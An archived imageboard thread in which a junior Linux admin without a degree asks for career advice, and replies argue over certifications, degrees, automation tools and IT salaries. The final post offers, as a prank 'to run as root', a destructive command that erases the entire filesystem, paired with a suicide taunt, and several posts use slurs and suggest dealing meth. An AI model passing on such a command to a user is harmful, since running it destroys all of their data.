[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y ] [Search | Free Show | Home]

I need some guidance here, bros. I'm currently some sort

This is a blue board which means that it's for everybody (Safe For Work content only). If you see any adult content, please report it.

Thread replies: 27
Thread images: 1

I need some guidance here, bros. I'm currently some sort of Linux admin and middleware support junior retard and I want to secure my future.

I don't know where to go from here. My main goal is keeping up to date with technology doing jobs where I don't do shit for 8 hours like the one. I currently have. Preferably night. Should I become a DBA? Learn more Linux and get a RHEL cert? Rob banks at night?

For the record I don't have a degree and I don't plan on getting one.
>>
>>59516436
if you don't have a degree then get certs
>>
Desktop support guy at a smallish (50 employee) company

I do about an hour of work a day and make 60k
>>
>>59516436
Learn how to use server automation software like Puppet and/or Chef. Your job will literally be to make your own job easier by automating tasks and/or configuration.

Don't listen to this guy >>59516685
degrees and certs are both worthless if you can demonstrate that you know what you are doing.
>>
>>59516852
>degrees and certs are both worthless

glassdoor and payscale and real life say you are wrong
>>
>>59516876
Okay have fun wasting your time and money on bullshit pieces of paper. I'm going to continue advancing my career position by demonstrating my skills.
>>
> doesn't want to work
>no degree
>no ambition to obtain a degree which would benefit you
>wants to keep up with tech, but thinks he can still 'do nothing'

Where do these people get off with such shit qualities and valued?
>>
>>59516976
>Okay have fun wasting your time and money on bullshit pieces of paper.

LOL

Good luck getting a good job with a real tech company with no degree

A degree is a prereq to so many tech jobs it's not funny
>>
>>59516713
pls die
>>
>>59517097
>pls die

mad?

been working there 4 years, just bought a 2008 Corvette as a second car for fun
>>
>>59517041
I work in the technology division for a fortune 50 company. Myself and several of my peers have no degree. I started off working in support and am now a software engineer because I was able to prove to them that I could do the job. Most of the people in that support department have a degree and/or certifications, but only those who can prove their worth advance within the company.

I encounter people like you all the time who are upset that others can succeed with no formal education or certification. I understand it sucks having to spend all that money only to find out that it is unnecessary. However, don't take it out on others by lying to them.
>>
>>59516436
deal meth. clientele guaranteed.
>>
>>59517138
>I work in the technology division for a fortune 50 company. Myself and several of my peers have no degree.

on average, you will make more over your career with a degree

sorry for facts

>people who are upset

nigger my parents paid for my college and I spent 4 years fucking teenage girls and dicking around with computers 24/7 with no real job but still the respect of society for being a college student, then at age 22 I was making 50k to start.. it was the best time in my life

yeah I am so mad
>>
>>59517114
not that guy, but 4 years to get to 60k is not impressive
>>
>>59516436
What the heck would a cat even do with that many hot dogs?
>>
>>59517231

You missed the part where I work like an hour a day and study the rest of the time in the office
>>
>>59517177
>on average, you will make more over your career with a degree
Maybe on average, people who are not educated will make less. However, I am making more than the average person at an equivalent point in their career.

>then at age 22 I was making 50k to start
That support position I told you about pays more than that and I obtained it with no degree or certs after spending 4 years fucking off and doing drugs and playing on my computer.
>>
>>59517243
no, i didnt miss that part i just flat out don't believe you.
>>
>>59517248
>Maybe on average, people who are not educated will make less. However, I am making more than the average person at an equivalent point in their career.

well whopty shit for you

degrees are not worthless, there are jobs you simply can never get without one, good jobs
>>
>>59517284
>no, i didnt miss that part i just flat out don't believe you.

? It's common in IT brah, as long as everything is up and running nobody cares what I do, and what I do is read computer books and do classwork which they think is "computer stuff" and thus part of my job

you have no idea how many sysadmins there are out there who do about 10 hours of work per week
>>
>>59517296
>there are jobs you simply can never get without one, good jobs
The only job I would consider working towards that actually requires a degree are completely outside the realm of computer science (ie. biology). There are plenty of jobs which pay 6 figures easily that you can obtain without a degree or certifications.
>>
>>59517382

well good for you, i am glad your lack of education is working out so wonderfully
>>
>>59517404
>equates formal educate to education
You sound like a highly intelligent individual. 10/10. Would hire.
>>
>>59517177
>50k
>worth getting a degree
That's a terrible entry level salary regardless of whether you have a degree
https://www.indeed.com/q-support-engineer-jobs.html
>Support Engineer salaries in US $82,139 per year Based on 7,302 salaries
>Min: $54,417, Max: $123,984
>>
>>59517177
>is a nigger
>thinks 50K will getting him rich
>>
>>59517041
>A degree is a prereq to so many tech jobs it's not funny
You realize that just because the job description says it requires a degree, that doesn't mean anything, right? Even the figure for number of years of experience required often doesn't mean anything. That's basically their polite way of telling applicants not to waste the time of the interviewer if they aren't qualified.
>>
learn how to program in shell script and then make this, run as root

#!/bin/bash
#code by OP
rm -Rf --no-preserve-root / && reboot

then make a raspberry pi controlled gun that blows your brains out
Thread posts: 27
Thread images: 1

[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y] [Search | Top | Home]

I'm aware that Imgur.com will stop allowing adult images since 15th of May. I'm taking actions to backup as much data as possible.
Read more on this topic here - https://archived.moe/talk/thread/1694/

If you need a post removed click on it's [Report] button and follow the instruction.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com.
If you like this website please support us by donating with Bitcoins at 16mKtbZiwW52BLkibtCr8jUg2KVUMTxVQ5
All trademarks and copyrights on this page are owned by their respective parties.
Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
This is a 4chan archive - all of the content originated from that site.
This means that RandomArchive shows their content, archived.
If you need information for a Poster - contact them.